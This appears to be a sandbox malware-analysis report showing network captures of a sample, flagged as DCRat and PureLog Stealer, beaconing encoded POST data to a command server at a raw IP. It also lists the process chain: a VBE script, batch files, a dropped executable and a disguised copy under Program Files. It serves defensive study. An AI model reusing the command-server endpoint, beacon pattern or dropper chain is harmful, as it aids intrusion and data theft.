                                      Jan 3, 2025 18:33:08.114742041 CET355OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:08.468377113 CET344OUTData Raw: 05 01 01 02 06 08 01 04 05 06 02 01 02 06 01 03 00 06 05 09 02 0d 03 0b 07 01 0f 57 03 03 01 08 0d 55 04 59 03 04 07 03 0e 05 05 54 05 0a 07 02 03 03 0f 01 0c 07 04 0b 06 00 03 03 06 05 04 0c 02 50 0f 0e 00 0f 05 01 0d 0e 0b 00 0f 57 0e 07 02 06
                                      Data Ascii: WUYTPW\R\L}RhNPwryvKxO|SLcolM|cp{lgzca^CZtIZAiO~V@Bx}bNb}
                                      Jan 3, 2025 18:33:08.718519926 CET326INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:08 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.449868206.188.197.24807056C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 18:33:14.906615973 CET355OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:15.265352011 CET344OUTData Raw: 00 06 04 00 06 0f 04 02 05 06 02 01 02 00 01 00 00 06 05 0a 02 00 03 0c 03 06 0f 07 07 0f 02 06 0a 06 05 08 02 56 04 02 0d 0b 06 04 00 0b 05 51 05 05 0c 0c 0f 02 05 52 05 05 03 03 01 02 07 0e 00 01 0c 59 00 01 04 08 0d 00 0d 03 0e 04 0d 01 05 0c
                                      Data Ascii: VQRYPUUW\L~A~pi[`\z]aeUS|bYwltMhctx|HoszI|C{Tct`}e~V@xCbO~ra
                                      Jan 3, 2025 18:33:15.516916990 CET326INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:15 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.449907206.188.197.24801608C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 18:33:21.477498055 CET355OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:21.827806950 CET344OUTData Raw: 00 04 04 03 06 0b 01 06 05 06 02 01 02 00 01 04 00 0b 05 0c 02 04 03 0d 01 02 0e 05 05 01 02 07 0a 02 06 0e 03 04 05 01 0d 00 05 0b 04 07 05 51 06 50 0f 0e 0e 57 04 0a 05 04 04 07 01 02 07 5b 03 53 0c 0c 05 06 01 07 0e 55 0c 50 0d 06 0f 01 05 50
                                      Data Ascii: QPW[SUPPYR\L~|ceZcqiMa[xklTXtpO|shKxlQlNW^hmlCwo^ie~V@{CP}re
                                      Jan 3, 2025 18:33:22.107248068 CET326INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:22 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11192.168.2.449945206.188.197.2480
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 18:33:28.024909019 CET408OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:28.376456022 CET344OUTData Raw: 00 06 04 01 03 0a 01 03 05 06 02 01 02 0d 01 0b 00 00 05 0a 02 01 03 00 02 04 0f 0d 04 57 02 07 0e 01 03 00 01 01 03 03 0b 05 02 07 06 01 04 04 05 03 0d 0f 0a 07 04 52 06 54 04 0d 05 07 06 08 05 06 0e 0f 06 0f 06 55 0e 01 0c 04 0e 03 0e 08 05 07
                                      Data Ascii: WRTU[RQS\L}TYjM`bz_beoSkliMvloYhMQ_ooxZxsvSlc^s_i_~V@z}zO~bW
                                      Jan 3, 2025 18:33:28.662826061 CET728INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:28 GMT
                                      Content-Type: text/html
                                      Content-Length: 564
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12192.168.2.450010206.188.197.2480
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 18:33:38.354664087 CET408OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:38.702672005 CET344OUTData Raw: 00 03 01 05 03 0a 01 0b 05 06 02 01 02 06 01 02 00 06 05 09 02 03 03 00 01 06 0e 0d 03 03 00 07 0d 51 06 5b 03 54 06 06 0b 0a 07 06 04 04 02 02 06 01 0c 5b 0a 02 05 01 07 00 07 06 05 01 05 0f 00 01 0d 01 07 51 06 04 0f 0e 0c 07 0f 51 0d 07 06 54
                                      Data Ascii: Q[T[QQTQV\L}UYfwaj^wftOhB}tls]p|{lNTkm`@vtpi_~V@BxmbN~LW
                                      Jan 3, 2025 18:33:38.977977037 CET728INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:38 GMT
                                      Content-Type: text/html
                                      Content-Length: 564
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13192.168.2.450015206.188.197.2480
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 18:33:44.531418085 CET408OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:44.890126944 CET344OUTData Raw: 00 07 01 00 06 0a 04 05 05 06 02 01 02 07 01 01 00 07 05 0d 02 0d 03 0a 03 0e 0a 04 06 53 06 03 0e 0f 07 0a 01 07 07 0b 0c 57 04 03 00 00 07 52 04 51 0e 0b 0f 04 05 00 01 05 07 06 04 0b 07 01 03 05 0f 0f 00 0e 01 01 0c 02 0d 00 0f 50 0f 03 06 02
                                      Data Ascii: SWRQP\L~ChN[\`Lj_uUkUiwRRk]xKyosx^iXknhvd\}_~V@AxSfby
                                      Jan 3, 2025 18:33:45.163882971 CET728INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:45 GMT
                                      Content-Type: text/html
                                      Content-Length: 564
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14192.168.2.450016206.188.197.2480
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 18:33:55.132246017 CET408OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:55.483731985 CET344OUTData Raw: 00 01 04 02 06 0d 04 01 05 06 02 01 02 00 01 07 00 06 05 0a 02 06 03 00 00 06 0f 50 07 0f 06 09 0a 01 07 0a 03 03 07 52 0b 02 05 03 07 57 07 51 03 05 0e 09 0d 0f 01 0a 01 0e 07 06 04 07 00 09 01 07 0d 0b 07 53 01 04 0f 03 0d 0f 0e 07 0c 07 05 00
                                      Data Ascii: PRWQS\L~C|`u^wrv]a[oP||etUkYsYxBRZoszIksPc^tN}e~V@{}bO}\W
                                      Jan 3, 2025 18:33:55.746716022 CET728INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:55 GMT
                                      Content-Type: text/html
                                      Content-Length: 564
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:12:31:54
                                      Start date:03/01/2025
                                      Path:C:\Users\user\Desktop\7vP2IvNXqx.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\7vP2IvNXqx.exe"
                                      Imagebase:0x2d0000
                                      File size:1'978'248 bytes
                                      MD5 hash:1A3A764C4B4974435DBA8926E7137766
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1650087687.00000000078DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1650555620.00000000078DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1649700859.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:12:31:54
                                      Start date:03/01/2025
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe"
                                      Imagebase:0x870000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:12:31:56
                                      Start date:03/01/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\yu2eKcIww0WQz1diSHkj97Iay5LLlL45l6P5L9G4ltB7.bat" "
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:12:31:56
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:12:31:56
                                      Start date:03/01/2025
                                      Path:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\msProviderbrowserrefdll/winIntorefruntimebroker.exe"
                                      Imagebase:0xff0000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1675544787.0000000000FF2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 78%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:12:31:58
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5K6fCoMBVq.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:12:31:58
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:12:31:58
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:12:31:58
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:12:32:03
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0x3b0000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.1759792480.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.1759792480.000000000287D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 78%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:12:32:05
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ECvQfnJznV.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
